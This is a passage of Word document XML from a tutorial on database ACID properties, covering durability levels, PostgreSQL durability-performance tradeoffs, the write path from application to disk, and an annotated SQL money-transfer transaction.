    <w:p w14:paraId="7DB64617" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Levels of durability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ABDD69" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6059E520" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>1. fsync to local disk (standard — PostgreSQL synchronous_commit=on):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7F09C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">   Data survives: process crash, OS crash, power loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729697C4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">   Data lost if: disk physically destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1649273A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="0F729AA4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>2. Synchronous replication to standby (synchronous_commit=remote_write):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA32C64" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">   Data survives: primary disk failure (replica has copy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EAD59E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">   Data lost if: both primary and replica fail simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C11C757" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="0119569C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>3. Synchronous replication to multiple standbys in different AZs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C57D8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">   Data survives: entire AZ failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62C3A7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">   Data lost if: multiple AZ simultaneous failure (extremely rare).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF895DC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="449A21F7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>4. Synchronous cross-region replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815E31C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">   Data survives: entire region failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB695F8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">   Data lost if: correlated multi-region failure (natural disaster scale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A41B0B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Durability vs. Performance Tradeoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE4791" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC65F6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Full durability (fsync every commit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E05181" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Each commit: ~0.5-2ms (SSD fsync latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA3921C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Throughput: ~500-2000 commits/sec per disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A292A9E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="5854BF32" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>Relaxed durability (group commit — batch multiple commits into one fsync):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637CC29" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Accumulate commits for 5-10ms → one fsync for all of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A0296B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Throughput: 10,000-50,000 commits/sec (amortized fsync cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61D69F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Risk: up to 10ms of transactions lost on crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073690D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  PostgreSQL: commit_delay, commit_siblings settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46920904" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="6B70AA81" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>No durability (synchronous_commit=off in PostgreSQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49FEB6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Commit returns immediately (no fsync wait).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD8308" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  WAL flushed in background (every wal_writer_delay, default 200ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A588780" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Throughput: 50,000+ commits/sec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0152F8D2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Risk: up to ~200ms of data lost on crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6720300E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Use case: Metrics, session data, anything re-derivable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E089E3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 The Durability Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3916B7FC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D1551" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204784F1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    │ COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C3D416" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC3538" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Database Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32828E78" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    │ Write to WAL buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A0655D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D7D7A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>OS Page Cache (volatile!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA358E1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    │ fsync() call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B95AC59" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08018882" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Disk Controller Cache (volatile without battery!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDEA337" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    │ Flush to platters/NAND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21285378" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316D7F2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>Persistent Media (SSD NAND / HDD platters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E671EFA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C4247" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>DANGER ZONES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78274F05" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - OS page cache: data lost on OS crash or power loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F599F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Disk controller cache: data lost on power loss (unless battery-backed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDE454" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5D53DE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  fsync() is supposed to flush through ALL caches to persistent media.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06672DF7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  But: some disks LIE about fsync (report success before actually flushing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B06B1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Enterprise SSDs with power-loss protection (capacitors) are critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C835A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="15B72BC4">
          <v:rect id="_x0000_i6699" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7DF60" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. How ACID Properties Work Together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C712AE2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C87051B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>A complete transaction execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DBB0F3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="712059CD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012213AC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Isolation: Take snapshot (MVCC) or acquire locks (2PL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13596D40" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0F9D4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  SELECT balance FROM accounts WHERE id = 'Alice';  → 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D2D98" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Consistency check (application): balance &gt;= 100? Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0AEDD9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A535833" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = 400 WHERE id = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6B897A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Atomicity: old value saved in undo log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A85C4D8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Isolation: new value not visible to others until commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD5CCC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Consistency: CHECK constraint verified (400 &gt;= 0) ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DDF25" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A64A88" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = balance + 100 WHERE id = 'Bob';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D86372C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  -- Same: undo logged, isolated, constraints checked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FF5ED1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE52482" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B66BFE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Durability: WAL flushed to disk (fsync)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65599DCD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Atomicity: all changes now permanent (or all rolled back if this fails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A07B9F5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Isolation: changes now visible to new transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5575C8D7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="22A6BBF8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>If ANY step fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7185E717" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  ROLLBACK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF60EE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Atomicity: undo log applied, all changes reversed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383662CD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Database returns to state before BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1979323C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- As if transaction never happened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988E084" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="2F16B3EE">
          <v:rect id="_x0000_i6700" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
